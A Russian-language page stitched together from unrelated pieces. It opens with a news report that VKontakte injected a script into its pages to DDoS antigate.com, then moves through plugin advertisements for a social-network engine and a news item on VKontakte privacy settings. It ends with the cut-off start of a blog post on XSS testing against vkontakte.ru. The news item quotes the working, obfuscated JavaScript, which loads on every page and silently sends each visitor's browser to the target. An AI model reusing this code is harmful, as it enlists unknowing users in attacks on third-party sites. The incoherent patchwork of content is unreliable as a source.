Социальная сеть «ВКонтакте» внедрила на все страницы сайта сценарий, осуществляющий DDoS атаку на сайт antigate.com.

Сегодня многие пользователи ВКонтакте, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.

На страницах пользователей загружался следующий javascript сценарий:

function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}

<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()"> 

Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.

Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.

securitylab

Уровни пользователей могут быть использованы для создание привилегий для некоторых пользователей. Вы можете предоставить/ограничить доступ пользователям в разные места своей социальной сети. Можно также назначить уровни, которые дают возможности модератора или администратора. Кроме того, используя функцию подписки, вы можете сделать повышение уровня за деньги.

Этот плагин "Google Maps в профиле" отображает местоположение пользователя и его друзей на карте в профиле пользователя с помощью двух различных виджетов. Администратор имеют возможность изменить стиль и расположение этих SE виджетов и настроить уровни доступа.

Это очень полезная функция для любого сайта!

Что интересует большинство интернет-пользователей? Конечно же развлечение. Львиная доля из них приходится на игры, видео и музыку.

Этот плагин дает возможность привлечь внимание аудитории на Ваш сайт, так как позволяет им смотреть, слушать и бесплатно скачивать музыку из интернета без каких-либо ограничений!

С использованием различных источников в Интернете вы можете найти музыку, которая нравится. Вся музыка хранится на удаленных серверах, так что вам не нужны огромные пространства на диске для хранения песен. Пользователь имеет возможность загрузить песню и слушать ее у вас в социальной сети.

Администрация социальной сети «Вконтакте» позволила пользователям заблокировать индексацию их личных профилей поисковыми системами. Помимо этого, пользователи также смогут скрыть свою учетную запись от внутреннего поиска социальной сети.

Таким образом, пользователям предлагают настройки приватности в двух вариантах: «недоступна внешним поисковым службам» и «недоступна «Вконтакте» и внешним службам». Администрация социальной сети отмечает, что информация с учетной записи пользователя может еще в течение месяца появляться в поисковой выдаче. Это связанно с тем, что поисковые системы определенное время хранят информацию о проиндексированных сайтах.

Напомним, что впервые учетные записи пользователей «Вконтакте» появились в поисковой выдаче в декабре 2010 года. На то время, «Вконтакте» заключила договор с «Яндексом», согласно которому поисковая система индексировала всю открытую пользователями информацию учетной записи.

Позже администрация социальной сети сделала часть информации на странице пользователей общедоступной. В феврале 2011 года было запрещено скрывать стену, а через несколько месяцев доступными для просмотра стали и списки друзей пользователей.

Такие изменения были негативно восприняты пользователями. В результате, администрация «Вконтакте» ввела списки «тайных друзей», не отображающихся на странице пользователя.

Довольно продвинутый и простой в использовании плагин электронной коммерции, который дает Вам и ваши пользователям возможность продавать и покупать. Настройки уровней дают вам возможность использовать его как простой магазин, где вы можете продавать некоторые товары для ваших пользователей, или как целый рынок, где пользователи смогут продавать свою продукцию друг другу.

Основные характеристики:
- Неограниченный уровень категорий и подкатегорий;
- Поиск по категориям, диапазону цен, ключевым словам и т.д.
- Пользовательские поля для товаров (вы можете добавлять поля, - таких как размер, цвет, вес и т.д.);
- Отчеты о продажах для пользователя и администратора;
- Уведомления по электронной почте с настраиваемыми шаблонами электронной почты;
- Комментарии;
- Параметры приватности;
- PayPal в качестве платежного шлюза;
- Профиль виджет с пользователями продукции;

Данное дополнение по моему мнению незаменимо. Каждый может добавлять своему другу или знакомому на стену Аудиозапись из своего списка, если предусмотрено приватностью пользователя. Трек можно скопировать, и если уже скопированно то ссылка не отображается! Имена в ленте активности склоняются!

Продолжаю каждый день выкладывать что-нибудь полезное и нужное. На этот раз это компонент подарков. Хорошая полезная вещь. Скринов нет, ибо скринить сейчас нечем. Может позже. Но установка настолько проста что проще поставить и попробовать самому.

Недавно я решил подготовить очередную презентацию, посвященную web-уязвимостям, в частности, XSS-атакам. Для этого мне нужно было изучить некоторые особенности современных систем фильтрации.

В качестве целевого сайта для тестирования я выбрал самый посещаемый сайт Рунета – vkontakte.ru. Мое внимание привлекла обновленная система статусов.